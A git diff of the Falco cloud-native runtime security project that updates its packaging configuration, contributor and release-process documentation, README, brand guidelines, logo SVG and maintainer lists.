-set(CPACK_RPM_EXCLUDE_FROM_AUTO_FILELIST_ADDITION /usr/src /usr/share/man /usr/share/man/man8 /etc /usr /usr/bin /usr/share /etc/rc.d /etc/rc.d/init.d)
-set(CPACK_RPM_PACKAGE_RELOCATABLE "OFF")
-
-include(CPack)
+# Packages configuration
+include(CPackConfig)
--- a/CODE_OF_CONDUCT.md
+++ b/CODE_OF_CONDUCT.md
@@ -1,6 +1,6 @@
-## CNCF Community Code of Conduct v1.0
+# CNCF Community Code of Conduct v1.0

-### Contributor Code of Conduct
+## Contributor Code of Conduct

 As contributors and maintainers of this project, and in the interest of fostering
 an open and welcoming community, we pledge to respect all people who contribute
@@ -32,8 +32,7 @@ Conduct may be permanently removed from the project team.
 This code of conduct applies both within project spaces and in public spaces
 when an individual is representing the project or its community.

-Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting a CNCF project maintainer, Sarah Novotny <sarahnovotny@google.com>, and/or Dan Kohn <dan@linuxfoundation.org>.
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting a CNCF project maintainer, [Sarah Novotny](mailto:sarahnovotny@google.com), and/or [Dan Kohn](mailto:dan@linuxfoundation.org).

-This Code of Conduct is adapted from the Contributor Covenant
-(http://contributor-covenant.org), version 1.2.0, available at
+This Code of Conduct is adapted from the [Contributor Covenant](http://contributor-covenant.org), version 1.2.0, available at
 http://contributor-covenant.org/version/1/2/0/
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -7,12 +7,17 @@
      - [More about labels](#more-about-labels)
    - [Slack](#slack)
  - [Pull Requests](#pull-requests)
+    - [Commit convention](#commit-convention)
+      - [Rule type](#rule-type)
+  - [Coding Guidelines](#coding-guidelines)
+    - [C++](#c)
+    - [Unit testing](/tests/README.md)
  - [Developer Certificate Of Origin](#developer-certificate-of-origin)

 ## Code of Conduct

 Falco has a
-[Code of Conduct](CODE_OF_CONDUCT)
+[Code of Conduct](CODE_OF_CONDUCT.md)
 to which all contributors must adhere, please read it before interacting with the repository or the community in any way.

 ## Issues
@@ -76,7 +81,7 @@ Some examples:

 ### Slack

-Other discussion, and **support requests** should go through the `#falco` channel in the Sysdig slack, please join [here](https://slack.sysdig.com).
+Other discussion, and **support requests** should go through the `#falco` channel in the Kubernetes slack, please join [here](https://slack.k8s.io/).

 ## Pull Requests

@@ -87,7 +92,7 @@ need a kind, make sure to specify the appropriate one by typing `/kind <KIND>`.

 The list of labels is [here](https://github.com/falcosecurity/falco/labels).

-Also feel free to suggest a reviewer with `/assign @theirname`.
+Also feel free to suggest a reviewer with `/cc @theirname`, or to assign an assignee using `/assign @nickname`.

 Once your reviewer is happy, they will say `/lgtm` which will apply the
 `lgtm` label, and will apply the `approved` label if they are an
@@ -96,6 +101,36 @@ Once your reviewer is happy, they will say `/lgtm` which will apply the
 Your PR will be automatically merged once it has the `lgtm` and `approved`
 labels, does not have any `do-not-merge/*` labels, and all status checks (eg., rebase, tests, DCO) are positive.

+### Commit convention
+
+As commit convention, we adopt [Conventional Commits v1.0.0](https://www.conventionalcommits.org/en/v1.0.0/), we have an history
+of commits that do not adopt the convention but any new commit must follow it to be eligible for merge.
+
+#### Rule type
+
+Besides the classic types, we adopt a type for rules, `rule(<scope>):`.
+Example:
+
+```
+rule(Write below monitored dir): make sure monitored dirs are monitored.
+```
+
+Each rule change must be on its own commit, if a change to a macro is done while changing a rule they can go together but only one rule per commit must happen.
+
+If you are changing only a macro, the commit will look like this:
+
+```
+rule(macro user_known_write_monitored_dir_conditions): make sure conditions are great
+```
+
+## Coding Guidelines
+
+### C++
+
+* File `userspace/engine/banned.h` defines some functions as invalid tokens. These functions are not allowed to be used in the codebase. Whenever creating a new cpp file, include the `"banned.h"` headers. This ensures that the banned functions are not compiled.
+
+  A complete list of banned functions can be found [here](./userspace/engine/banned.h).
+
 ## Developer Certificate Of Origin

 The [Developer Certificate of Origin (DCO)](https://developercertificate.org/) is a lightweight way for contributors to certify that they wrote or otherwise have the right to submit the code they are contributing to the project.
--- a/2
+++ b/2
@@ -187,7 +187,7 @@
      same "printed page" as the copyright notice for easier
      identification within third-party archives.

-   Copyright [yyyy] [name of copyright owner]
+   Copyright 2019 The Falco Authors

   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
--- a/GOVERNANCE.md
+++ b/GOVERNANCE.md
--- a/11
+++ b/11
@@ -1,11 +0,0 @@
-Current maintainers:
-@mstemm - Mark Stemm <mark.stemm@sysdig.com>
-@ldegio - Loris Degioanni <loris@sysdig.com>
-@fntlnz - Lorenzo Fontana <lo@sysdig.com>
-@leodido - Leonardo Di Donato <leo@sysdig.com>
-
-Community Mangement:
-@mfdii - Michael Ducy <michael@sysdig.com>
-
-Emeritus maintainers:
-@henridf - Henri Dubois-Ferriere <henri.dubois-ferriere@sysdig.com>
--- a/2
+++ b/2
@@ -3,6 +3,7 @@ approvers:
  - kris-nova
  - leodido
  - mstemm
+  - leogr
 reviewers:
  - fntlnz
  - kaizhe
@@ -10,3 +11,4 @@ reviewers:
  - leodido
  - mfdii
  - mstemm
+  - leogr
--- a/README.md
+++ b/README.md
@@ -1,20 +1,25 @@
-<p><img align="right" src="https://github.com/falcosecurity/falco-website/raw/master/themes/falco-fresh/static/images/favicon.png" width="64px"/></p>
-<p></p>
+<p align="center"><img src="https://raw.githubusercontent.com/falcosecurity/community/master/logo/primary-logo.png" width="360"></p>
+<p align="center"><b>Cloud Native Runtime Security.</b></p>

-# Falco
+<hr>

-#### Latest release
+# The Falco Project

-**v0.17.0**
-Read the [change log](https://github.com/falcosecurity/falco/blob/dev/CHANGELOG.md)
+[![Build Status](https://img.shields.io/circleci/build/github/falcosecurity/falco/master?style=for-the-badge)](https://circleci.com/gh/falcosecurity/falco) [![CII Best Practices Summary](https://img.shields.io/cii/summary/2317?label=CCI%20Best%20Practices&style=for-the-badge)](https://bestpractices.coreinfrastructure.org/projects/2317) [![GitHub](https://img.shields.io/github/license/falcosecurity/falco?style=for-the-badge)](COPYING)

-Dev Branch: [![Build Status](https://travis-ci.com/falcosecurity/falco.svg?branch=dev)](https://travis-ci.com/falcosecurity/falco)<br />
-Master Branch: [![Build Status](https://travis-ci.com/falcosecurity/falco.svg?branch=master)](https://travis-ci.com/falcosecurity/falco)<br />
-CII Best Practices: [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/2317/badge)](https://bestpractices.coreinfrastructure.org/projects/2317)
+#### Latest releases
+
+Read the [change log](CHANGELOG.md).
+
+|        | development                                                                                                                 | stable                                                                                                              |
+|--------|-----------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------|
+| rpm    | [![rpm-dev](https://img.shields.io/bintray/v/falcosecurity/rpm-dev/falco?label=Falco&color=%2300aec7&style=flat-square)][1] | [![rpm](https://img.shields.io/bintray/v/falcosecurity/rpm/falco?label=Falco&color=%23005763&style=flat-square)][2] |
+| deb    | [![deb-dev](https://img.shields.io/bintray/v/falcosecurity/deb-dev/falco?label=Falco&color=%2300aec7&style=flat-square)][3] | [![deb](https://img.shields.io/bintray/v/falcosecurity/deb/falco?label=Falco&color=%23005763&style=flat-square)][4] |
+| binary | [![bin-dev](https://img.shields.io/bintray/v/falcosecurity/bin-dev/falco?label=Falco&color=%2300aec7&style=flat-square)][5] | [![bin](https://img.shields.io/bintray/v/falcosecurity/bin/falco?label=Falco&color=%23005763&style=flat-square)][6] |

 ---

-Falco is a behavioral activity monitor designed to detect anomalous activity in your applications. Powered by [sysdig’s](https://github.com/draios/sysdig) system call capture infrastructure, Falco lets you continuously monitor and detect container, application, host, and network activity—all in one place—from one source of data, with one set of rules.
+Falco is a behavioral activity monitor designed to detect anomalous activity in your applications. Falco audits a system at the most fundamental level, the kernel. Falco then enriches this data with other input streams such as container runtime metrics, and Kubernetes metrics. Falco lets you continuously monitor and detect container, application, host, and network activity—all in one place—from one source of data, with one set of rules.

 Falco is hosted by the Cloud Native Computing Foundation (CNCF) as a sandbox level project. If you are an organization that wants to help shape the evolution of technologies that are container-packaged, dynamically-scheduled and microservices-oriented, consider joining the CNCF. For details read the [Falco CNCF project proposal](https://github.com/cncf/toc/tree/master/proposals/falco.adoc).

@@ -32,7 +37,9 @@ Falco can detect and alert on any behavior that involves making Linux system cal

 ### Installing Falco

-A comprehensive [installation guide](https://falco.org/docs/installation/) for Falco is available in the documentation website.
+You can find the latest release downloads on the official [release archive](https://bintray.com/falcosecurity)
+
+Furthermore the comprehensive [installation guide](https://falco.org/docs/installation/) for Falco is available in the documentation website.

 #### How do you compare Falco with other security tools?

@@ -41,25 +48,37 @@ One of the questions we often get when we talk about Falco is “How does Falco

 Documentation
 ---
+
 See [Falco Documentation](https://falco.org/docs/) to quickly get started using Falco.

 Join the Community
 ---
-* [Join the mailing list](http://bit.ly/2Mu0wXA) for news and a Google calendar invite for our Falco open source meetings. Note: this is the only way to get a calendar invite for our open meetings.
-* [Website](https://falco.org) for Falco.
-* Join our [Public Slack](https://slack.sysdig.com) channel for open source Sysdig and Falco announcements and discussions.

-Office hours
---
-
-Falco has bi-weekly office hour style meetings where we plan our work on the project. You can get a Google calendar invite by joining the mailing list. It will automatically be sent.
-
-Wednesdays at 8am Pacific on [Zoom](https://sysdig.zoom.us/j/213235330).
+To get involved with The Falco Project please visit [the community repository](https://github.com/falcosecurity/community) to find more.

 License Terms
 ---
+
 Falco is licensed to you under the [Apache 2.0](./COPYING) open source license.

 Contributing
 ---
+
 See the [CONTRIBUTING.md](./CONTRIBUTING.md).
+
+Security
+---
+
+### Security Audit
+
+A third party security audit was performed by Cure53, you can see the full report [here](./audits/SECURITY_AUDIT_2019_07.pdf).
+
+### Reporting security vulnerabilities
+Please report security vulnerabilities following the community process documented [here](https://github.com/falcosecurity/.github/blob/master/SECURITY.md).
+
+[1]: https://dl.bintray.com/falcosecurity/rpm-dev
+[2]: https://dl.bintray.com/falcosecurity/rpm
+[3]: https://dl.bintray.com/falcosecurity/deb-dev/stable
+[4]: https://dl.bintray.com/falcosecurity/deb/stable
+[5]: https://dl.bintray.com/falcosecurity/bin-dev/x86_64
+[6]: https://dl.bintray.com/falcosecurity/bin/x86_64
--- a/RELEASE.md
+++ b/RELEASE.md
@@ -0,0 +1,81 @@
+# Falco Release Process
+
+Our release process is mostly automated, but we still need some manual steps to initiate and complete it.
+
+Changes and new features are grouped in [milestones](https://github.com/falcosecurity/falco/milestones), the milestone with the next version represents what is going to be released.
+
+Releases happen on a monthly cadence, towards the 16th of the on-going month, and we need to assign owners for each (usually we pair a new person with an experienced one). Assignees and the due date are proposed during the [weekly community call](https://github.com/falcosecurity/community). Note that hotfix releases can happen as soon as it is needed.
+
+Finally, on the proposed due date the assignees for the upcoming release proceed with the processes described below.
+
+## Pre-Release Checklist
+
+### 1. Release notes
+- Let `YYYY-MM-DD` the day before of the [latest release](https://github.com/falcosecurity/falco/releases)
+- Check the release note block of every PR matching the `is:pr is:merged closed:>YYYY-MM-DD` [filter](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+closed%3A%3EYYYY-MM-DD)
+    - Ensure the release note block follows the [commit convention](https://github.com/falcosecurity/falco/blob/master/CONTRIBUTING.md#commit-convention), otherwise fix its content
+    - If the PR has no milestone, assign it to the milestone currently undergoing release
+- Check issues without a milestone (using [is:pr is:merged no:milestone closed:>YYYT-MM-DD](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+no%3Amilestone+closed%3A%3EYYYT-MM-DD) filter) and add them to the milestone currently undergoing release
+- Double-check that there are no more merged PRs without the target milestone assigned with the `is:pr is:merged no:milestone closed:>YYYT-MM-DD` [filters](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+no%3Amilestone+closed%3A%3EYYYT-MM-DD), if any, fix them
+
+### 2. Milestones
+
+- Move the [tasks not completed](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Aopen) to a new minor milestone
+
+### 3. Release PR
+
+- Double-check if any hard-coded version number is present in the code, it should be not present anywhere:
+    - If any, manually correct it then open an issue to automate version number bumping later
+    - Versions table in the `README.md` update itself automatically
+- Generate the change log https://github.com/leodido/rn2md, or https://fs.fntlnz.wtf/falco/milestones-changelog.txt for the lazy people (it updates every 5 minutes)
+- Add the lastest changes on top the previous `CHANGELOG.md`
+- Submit a PR with the above modifications
+- Await PR approval
+- Close the completed milestone as soon PR is merged
+
+## Release
+
+Let `x.y.z` the new version.
+
+### 1. Create a tag
+
+- Once the release PR has got merged, and the CI has done its job on the master, git tag the new release
+
+    ```
+    git pull
+    git checkout master
+    git tag x.y.z
+    git push origin x.y.z
+    ```
+
+> **N.B.**: do NOT use an annotated tag
+
+- Wait for the CI to complete
+
+### 2. Update the GitHub release
+
+- [Draft a new release](https://github.com/falcosecurity/falco/releases/new)
+- Use `x.y.z` both as tag version and release title
+- Use the following template to fill the release description:
+    ```
+    <!-- Copy the relevant part of the changelog here -->
+
+    ### Statistics
+
+    | Merged PRs        | Number  |
+    |-------------------|---------|
+    | Not user-facing   | x       |
+    | Release note      | x       |
+    | Total             | x       |
+
+    <!-- Calculate stats and fill the above table -->
+    ```
+
+- Finally, publish the release!
+
+## Post-Release tasks
+
+Announce the new release to the world!
+
+- Send an announcement to cncf-falco-dev@lists.cncf.io (plain text, please)
+- Let folks in the slack #falco channel know about a new release came out
--- a/audits/SECURITY_AUDIT_2019_07.pdf
+++ b/audits/SECURITY_AUDIT_2019_07.pdf
--- a/brand/README.md
+++ b/brand/README.md
@@ -0,0 +1,142 @@
+<p align="center"><img src="primary-logo.png" width="360"></p>
+<p align="center"><b>Cloud Native Runtime Security.</b></p>
+
+# Falco Branding Guidelines
+
+This document describes The Falco Project's branding guidelines, language, and message.
+
+Content in this document can be used to publically share about Falco.
+
+
+
+### Logo
+
+There are 3 logos available for use in this directory. Use the primary logo unless required otherwise due to background issues, or printing.
+
+The Falco logo is Apache 2 licensed and free to use in media and publication for the CNCF Falco project.
+
+### Slogan
+
+> Cloud Native Runtime Security
+
+### What is Falco?
+
+Falco is a runtime security project originally created by Sysdig, Inc.
+Falco was contributed to the CNCF in October 2018.
+The CNCF now owns The Falco Project.
+
+### What is Runtime Security?
+
+Runtime security refers to an approach to preventing unwanted activity on a computer system. 
+With runtime security, an operator deploys **both** prevention tooling (access control, policy enforcement, etc) along side detection tooling (systems observability, anomaly detection, etc).
+Runtime security is the practice of using detection tooling to detect unwanted behavior, such that it can then be prevented using prevention techniques.
+Runtime security is a holistic approach to defense, and useful in scenarios where prevention tooling either was unaware of an exploit or attack vector, or when defective applications are ran in even the most secure environment.
+
+### What does Falco do?
+
+Falco consumes signals from the Linux kernel, and container management tools such as Docker and Kubernetes.
+Falco parses the signals and asserts them against security rules.
+If a rule has been violated, Falco triggers an alert. 
+
+### How does Falco work?
+
+Falco traces kernel events and reports information about the system calls being executed at runtime.
+Falco leverages the extended berkley packet filter (eBPF) which is a kernel feature implemented for dynamic crash-resilient and secure code execution in the kernel. 
+Falco enriches these kernel events with information about containers running on the system.
+Falco also can consume signals from other input streams such as the containerd socket, the Kubernetes API server and the Kubernetes audit log.
+At runtime, Falco will reason about these events and assert them against configured security rules.
+Based on the severity of a violation an alert is triggered.
+These alerts are configurable and extensible, for instance sending a notification or [plumbing through to other projects like Prometheus](https://github.com/falcosecurity/falco-exporter). 
+
+### Benefits of using Falco
+
+ - **Strengthen Security** Create security rules driven by a context-rich and flexible engine to define unexpected application behavior.
+ - **Reduce Risk** Immediately respond to policy violation alerts by plugging Falco into your current security response workflows and processes.
+ - **Leverage up-to-date Rules** Alert using community-sourced detections of malicious activity and CVE exploits.
+    
+### Falco and securing Kubernetes
+
+Securing Kubernetes requires putting controls in place to detect unexpected behavior that could be malicious or harmful to a cluster or application(s). 
+
+Examples of malicious behavior include: 
+
+ - Exploits of unpatched and new vulnerabilities in applications or Kubernetes itself. 
+ - Insecure configurations in applications or Kubernetes itself. 
+ - Leaked or weak credentials or secret material.
+ - Insider threats from adjacent applications running at the same layer. 
+
+Falco is capable of [consuming the Kubernetes audit logs](https://kubernetes.io/docs/tasks/debug-application-cluster/falco/#use-falco-to-collect-audit-events).
+By adding Kubernetes application context, and Kubernetes audit logs teams can understand who did what.
+                                 
+### Writing about Falco
+
+##### Yes
+
+Notice the capitalization of the following terms.
+
+ - The Falco Project
+ - Falco
+
+##### No
+
+ - falco
+ - the falco project
+ - the Falco project
+
+### Encouraged Phrasing
+
+Below are phrases that the project has reviewed, and found to be effective ways of messaging Falco's value add.
+Even when processes are in place for vulnerability scanning and implementing pod security and network policies, not every risk will be addressed. You still need mechanisms to confirm these security barriers are effective, help configure them, and provide with a last line of defense when they fail.
+
+##### Falco as a factory
+
+This term refers to the concept that Falco is a stateless processing engine. A large amount of data comes into the engine, but meticulously crafted security alerts come out.
+
+##### The engine that powers...
+
+Falco ultimately is a security engine. It reasons about signals coming from a system at runtime, and can alert if an anomaly is detected.
+
+##### Anomaly detection
+
+This refers to an event that occurs with something unsual, concerning, or odd occurs.
+We can associate anomalies with unwanted behavior, and alert in their presence.
+
+##### Detection tooling
+
+Falco does not prevent unwanted behavior.
+Falco however alerts when unusual behavior occurs.
+This is commonly referred to as **detection** or **forensics**.
+
+
+---
+
+# Glossary 
+
+#### Probe
+
+Used to describe the `.o` object that would be dynamically loaded into the kernel as a secure and stable (e)BPF probe. 
+This is one option used to pass kernel events up to userspace for Falco to consume.
+Sometimes this word is incorrectly used to refer to a `module`.
+
+#### Module
+
+Used to describe the `.ko` object that would be loaded into the kernel as a potentially risky kernel module.
+This is one option used to pass kernel events up to userspace for Falco to consume.
+Sometimes this word is incorrectly used to refer to a `probe`.
+
+#### Driver 
+
+The global term for the software that sends events from the kernel. Such as the eBPF `probe` or the `kernel module`.
+
+#### Falco
+
+The name of the project, and also the name of [the main engine](https://github.com/falcosecurity/falco) that the rest of the project is built on.
+
+#### Sysdig, Inc
+
+The name of the company that originally created The Falco Project, and later donated to the CNCF.
+
+#### sysdig 
+
+A [CLI tool](https://github.com/draios/sysdig) used to evaluate kernel system events at runtime. 
+
--- a/brand/primary-logo.png
+++ b/brand/primary-logo.png
--- a/brand/teal-logo.svg
+++ b/brand/teal-logo.svg
@@ -0,0 +1 @@
+<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 708.41 374.92"><defs><style>.cls-1{fill:#00b4c8;}</style></defs><title>Falco horizontal logo_teal2</title><g id="fqqZXT"><path class="cls-1" d="M204.69,154.4Q151.5,208,98,261.25a48.42,48.42,0,0,1-5.27,4.87c-2.55,1.89-5.34,2-7.65-.45s-1.51-5,.41-7.06c4.6-4.94,9.35-9.74,14.13-14.5q52.56-52.31,105.14-104.59c3.35-3.34,18.05,7.52,21.58,11.1"/><path class="cls-1" d="M215.06,171.36c-.15,2.14-1.54,3.55-2.93,4.94l-87.82,87.79c-2.75,2.74-6,5.42-9.46,1.68-3.15-3.39-.5-6.44,2.06-9q43.44-43.44,86.89-86.87c2.21-2.22,4.58-4.23,8-3A4.61,4.61,0,0,1,215.06,171.36Z"/><path class="cls-1" d="M70.93,71c2.42-.09,4.09,1.31,5.64,2.87q41.82,41.79,83.61,83.59c2.6,2.61,5,5.74,1.69,9s-6.41,1-9-1.66Q111,123,69.25,81.2c-2.09-2.1-3.72-4.39-2.45-7.53A4.34,4.34,0,0,1,70.93,71Z"/><path class="cls-1" d="M203.42,268c-5,1-8.9-1.34-12.45-5-6.35-6.61-12.87-13-19.41-19.46-3.85-3.8-4-7.41-.14-11.28,11.14-11.07,22.21-22.21,33.35-33.29,2.45-2.44,5.43-4.49,8.55-1.55,3.48,3.29,1.19,6.41-1.39,9-8.74,8.84-17.44,17.73-26.4,26.35-3.4,3.27-3.93,5.72-.19,9.06,4.22,3.78,8.13,7.91,12,12,2.54,2.68,5.35,4.25,9.18,4.11s8.28-.12,8.16,5.09c-.12,5-4.74,4.8-8.4,5.14A21,21,0,0,1,203.42,268Z"/><path class="cls-1" d="M148.7,178.36c-.75,3.49-2.68,5.6-6.43,4.36a13,13,0,0,1-4.74-3.31q-30.11-30-60.1-60a23.14,23.14,0,0,1-2.56-3c-1.72-2.42-1.88-5,.3-7.11s4.84-1.76,7,.26c3.65,3.42,7.17,7,10.71,10.53q25.65,25.64,51.28,51.3C146.12,173.37,148.49,175.13,148.7,178.36Z"/><path class="cls-1" d="M133.74,192.93a4.9,4.9,0,0,1-2.53,4.29,5.37,5.37,0,0,1-6.63-.95c-3.35-3.1-6.57-6.34-9.8-9.57q-14.34-14.3-28.61-28.63a34.27,34.27,0,0,1-4.17-5,4.57,4.57,0,0,1,.36-6,5,5,0,0,1,6-1.12,11.65,11.65,0,0,1,3.7,2.58q19.44,19.33,38.79,38.76C132.4,188.85,133.77,190.54,133.74,192.93Z"/></g><path class="cls-1" d="M413.15,190.86a25.57,25.57,0,0,0-10.35-6.63,46.78,46.78,0,0,0-16-2.37A83.35,83.35,0,0,0,372,183.12a75.16,75.16,0,0,0-10.58,2.53l2.37,15.48a53.47,53.47,0,0,1,9-2.21A72.44,72.44,0,0,1,385,198a22.61,22.61,0,0,1,8.13,1.26,13,13,0,0,1,5.22,3.56,13.23,13.23,0,0,1,2.76,5.29,24.6,24.6,0,0,1,.79,6.32v3.16a61.65,61.65,0,0,0-7.42-1.34,57.43,57.43,0,0,0-6.64-.4,61.45,61.45,0,0,0-13,1.35,32.26,32.26,0,0,0-11,4.42,22.7,22.7,0,0,0-7.51,8,24.09,24.09,0,0,0-2.76,12A28.39,28.39,0,0,0,356,254.05a21.6,21.6,0,0,0,6.79,8.22,28.56,28.56,0,0,0,10.51,4.58,60.24,60.24,0,0,0,13.58,1.42A137.25,137.25,0,0,0,407,266.93c5.94-.9,10.4-1.66,13.35-2.29V214.56a50.84,50.84,0,0,0-1.66-13.35A24.93,24.93,0,0,0,413.15,190.86Zm-11.3,61.3a71.4,71.4,0,0,1-13.43.94q-7.26,0-11.53-2.6t-4.26-9.4a10,10,0,0,1,1.57-5.77,10.67,10.67,0,0,1,4.19-3.55,20.18,20.18,0,0,1,5.85-1.74,43.43,43.43,0,0,1,6.39-.47,42.23,42.23,0,0,1,6.64.47,37,37,0,0,1,4.58,1Z"/><path class="cls-1" d="M461.38,248.44a9.27,9.27,0,0,1-2-4,26.17,26.17,0,0,1-.55-5.85V143.94l-19.12,3.16v95.1a40.74,40.74,0,0,0,1.35,11,17.57,17.57,0,0,0,4.66,8.06,21.71,21.71,0,0,0,8.92,5,52,52,0,0,0,14.14,1.89l2.69-15.8a29.78,29.78,0,0,1-6.24-1.34A8.76,8.76,0,0,1,461.38,248.44Z"/><path class="cls-1" d="M532.2,251.05a49.24,49.24,0,0,1-9.64.95q-13.11,0-18.64-7.19t-5.53-19.51q0-12.8,5.85-19.83t17.06-7a40.4,40.4,0,0,1,8.92.95,43.38,43.38,0,0,1,7.51,2.37l4.1-15.64a57.88,57.88,0,0,0-22.11-4.26,42.15,42.15,0,0,0-17.06,3.31,37.35,37.35,0,0,0-12.88,9.17,40.64,40.64,0,0,0-8.14,13.82,50.82,50.82,0,0,0-2.84,17.14,56.83,56.83,0,0,0,2.53,17.3A37.22,37.22,0,0,0,489,256.34a34.82,34.82,0,0,0,13,9,47.83,47.83,0,0,0,18.4,3.24,68.05,68.05,0,0,0,13.19-1.27,39.84,39.84,0,0,0,9.56-2.84l-2.69-15.8A45,45,0,0,1,532.2,251.05Z"/><path class="cls-1" d="M625.77,207.37a40.7,40.7,0,0,0-8.14-13.67,35.23,35.23,0,0,0-12.56-8.76,40.93,40.93,0,0,0-16-3.08,40.34,40.34,0,0,0-16,3.08,36.32,36.32,0,0,0-12.56,8.76,39.88,39.88,0,0,0-8.21,13.67,51.31,51.31,0,0,0-2.93,17.77A52,52,0,0,0,552.31,243a40.47,40.47,0,0,0,8.13,13.75,36.57,36.57,0,0,0,12.48,8.85A40.14,40.14,0,0,0,589,268.74a40.69,40.69,0,0,0,16.19-3.15,36.32,36.32,0,0,0,12.56-8.85A39.7,39.7,0,0,0,625.85,243a53.47,53.47,0,0,0,2.84-17.85A51.55,51.55,0,0,0,625.77,207.37Zm-22,37.52q-5.29,7.28-14.77,7.27t-14.77-7.27q-5.29-7.26-5.3-19.75,0-12.31,5.3-19.51T589,198.44q9.48,0,14.77,7.19t5.29,19.51Q609.1,237.62,603.81,244.89Z"/><path class="cls-1" d="M347.24,218h-47.8v50.57H279.65V150h75.89v15.88h-56.1v36.23h47.8Z"/></svg>
--- a/brand/white-logo.png
+++ b/brand/white-logo.png
--- a/cmake/cpack/CMakeCPackOptions.cmake
+++ b/cmake/cpack/CMakeCPackOptions.cmake
@@ -1,20 +1,3 @@
-#
-# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
-#
-# This file is part of falco .
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-#     http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
 if(CPACK_GENERATOR MATCHES "DEB")
 	list(APPEND CPACK_INSTALL_COMMANDS "mkdir -p _CPack_Packages/${CPACK_TOPLEVEL_TAG}/${CPACK_GENERATOR}/${CPACK_PACKAGE_FILE_NAME}/etc/init.d/")
 	list(APPEND CPACK_INSTALL_COMMANDS "cp scripts/debian/falco _CPack_Packages/${CPACK_TOPLEVEL_TAG}/${CPACK_GENERATOR}/${CPACK_PACKAGE_FILE_NAME}/etc/init.d")
--- a/cmake/cpack/debian/conffiles
+++ b/cmake/cpack/debian/conffiles
--- a/cmake/modules/CPackConfig.cmake
+++ b/cmake/modules/CPackConfig.cmake
@@ -0,0 +1,57 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+set(CPACK_PACKAGE_NAME "${PACKAGE_NAME}")
+set(CPACK_PACKAGE_VENDOR "Cloud Native Computing Foundation (CNCF) cncf.io.")
+set(CPACK_PACKAGE_CONTACT "cncf-falco-dev@lists.cncf.io") # todo: change this once we've got @falco.org addresses
+set(CPACK_PACKAGE_DESCRIPTION_SUMMARY "Falco - Container Native Runtime Security")
+set(CPACK_PACKAGE_DESCRIPTION_FILE "${PROJECT_SOURCE_DIR}/scripts/description.txt")
+set(CPACK_PACKAGE_VERSION "${FALCO_VERSION}")
+set(CPACK_PACKAGE_VERSION_MAJOR "${FALCO_VERSION_MAJOR}")
+set(CPACK_PACKAGE_VERSION_MINOR "${FALCO_VERSION_MINOR}")
+set(CPACK_PACKAGE_VERSION_PATCH "${FALCO_VERSION_PATCH}")
+set(CPACK_PACKAGE_FILE_NAME "${CPACK_PACKAGE_NAME}-${CPACK_PACKAGE_VERSION}-${CMAKE_SYSTEM_PROCESSOR}")
+set(CPACK_PROJECT_CONFIG_FILE "${PROJECT_SOURCE_DIR}/cmake/cpack/CMakeCPackOptions.cmake")
+set(CPACK_STRIP_FILES "ON")
+set(CPACK_PACKAGE_RELOCATABLE "OFF")
+
+set(CPACK_GENERATOR DEB RPM TGZ)
+
+set(CPACK_DEBIAN_PACKAGE_SECTION "utils")
+set(CPACK_DEBIAN_PACKAGE_ARCHITECTURE "amd64")
+set(CPACK_DEBIAN_PACKAGE_HOMEPAGE "https://www.falco.org")
+set(CPACK_DEBIAN_PACKAGE_DEPENDS "dkms (>= 2.1.0.0), libyaml-0-2")
+set(CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA
+    "${CMAKE_BINARY_DIR}/scripts/debian/postinst;${CMAKE_BINARY_DIR}/scripts/debian/prerm;${CMAKE_BINARY_DIR}/scripts/debian/postrm;${PROJECT_SOURCE_DIR}/cmake/cpack/debian/conffiles"
+)
+
+set(CPACK_RPM_PACKAGE_LICENSE "Apache v2.0")
+set(CPACK_RPM_PACKAGE_URL "https://www.falco.org")
+set(CPACK_RPM_PACKAGE_REQUIRES "dkms, kernel-devel, libyaml, ncurses")
+set(CPACK_RPM_POST_INSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/postinstall")
+set(CPACK_RPM_PRE_UNINSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/preuninstall")
+set(CPACK_RPM_POST_UNINSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/postuninstall")
+set(CPACK_RPM_PACKAGE_VERSION "${FALCO_VERSION}")
+set(CPACK_RPM_EXCLUDE_FROM_AUTO_FILELIST_ADDITION
+    /usr/src
+    /usr/share/man
+    /usr/share/man/man8
+    /etc
+    /usr
+    /usr/bin
+    /usr/share
+    /etc/rc.d
+    /etc/rc.d/init.d)
+set(CPACK_RPM_PACKAGE_RELOCATABLE "OFF")
+
+include(CPack)
--- a/cmake/modules/Catch.cmake
+++ b/cmake/modules/Catch.cmake
@@ -1,5 +1,5 @@
-# Distributed under the OSI-approved BSD 3-Clause License.  See accompanying
-# file Copyright.txt or https://cmake.org/licensing for details.
+# Distributed under the OSI-approved BSD 3-Clause License.  See accompanying file Copyright.txt or
+# https://cmake.org/licensing for details.

 #[=======================================================================[.rst:
 Catch
